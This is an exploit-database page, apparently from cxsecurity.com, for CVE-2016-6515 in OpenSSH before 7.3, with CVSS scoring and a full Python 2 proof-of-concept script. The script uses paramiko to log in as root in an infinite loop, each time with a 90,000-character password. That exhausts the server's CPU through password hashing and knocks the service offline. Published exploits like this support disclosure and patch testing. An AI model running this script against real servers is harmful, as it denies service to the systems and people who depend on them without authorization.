OpenSSH 7.2 Denial Of Service

2016.12.08
Credit: Kashinath T
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

################################################################################ # Title : OpenSSH before 7.3 Crypt CPU Consumption (DoS Vulnerability) # Author : Kashinath T (tkashinath@secpod.com) (www.secpod.com) # Vendor : http://www.openssh.com/ # Software : http://www.openssh.com/ # Version : OpenSSH before 7.3 # Tested on : Ubuntu 16.04 LTS, Centos 7 # CVE : CVE-2016-6515 # Date : 20-10-2016 # # NOTE: # If the remote machine is installed and running OpenSSH version prior to 7.3, # it does not limit the password length for authentication. Hence, to exploit # this vulnerability' we will send a crafted data which is of 90000 characters # in length to the 'password' field while attempting to log in to a remote # machine via ssh with username as 'root'. # # For more info refer, # http://www.secpod.com/blog/openssh-crypt-cpu-consumption ################################################################################ import sys from random import choice from string import lowercase try: import paramiko except ImportError: print "[-] python module 'paramiko' is missing, Install paramiko with" \ " following command 'sudo pip install paramiko'" sys.exit(0) class ssh_exploit: def __init__(self): """ Initialise the objects """ def ssh_login(self, remote_ip): try: # Crafted password of length 90000 passwd_len = 90000 crafted_passwd = "".join(choice(lowercase) for i in range(passwd_len)) # Connect to a remote machine via ssh ssh = paramiko.SSHClient() ssh.load_system_host_keys() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # calling connect in infinite loop print "[+] Entering infinite loop" while 1: ssh.connect(remote_ip, username='root', password=crafted_passwd) except Exception, msg: print "Error in connecting to remote host : ", remote_ip print "Exception in : ssh_login method." sys.exit(msg) def main(): if len(sys.argv) != 2: print "usage: python openssh_crypt_cpu_consumption_dos.py 192.168.x.x" sys.exit() # Calling ssh_connect ref_obj = ssh_exploit() ref_obj.ssh_login(sys.argv[1]) if __name__ == "__main__": main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top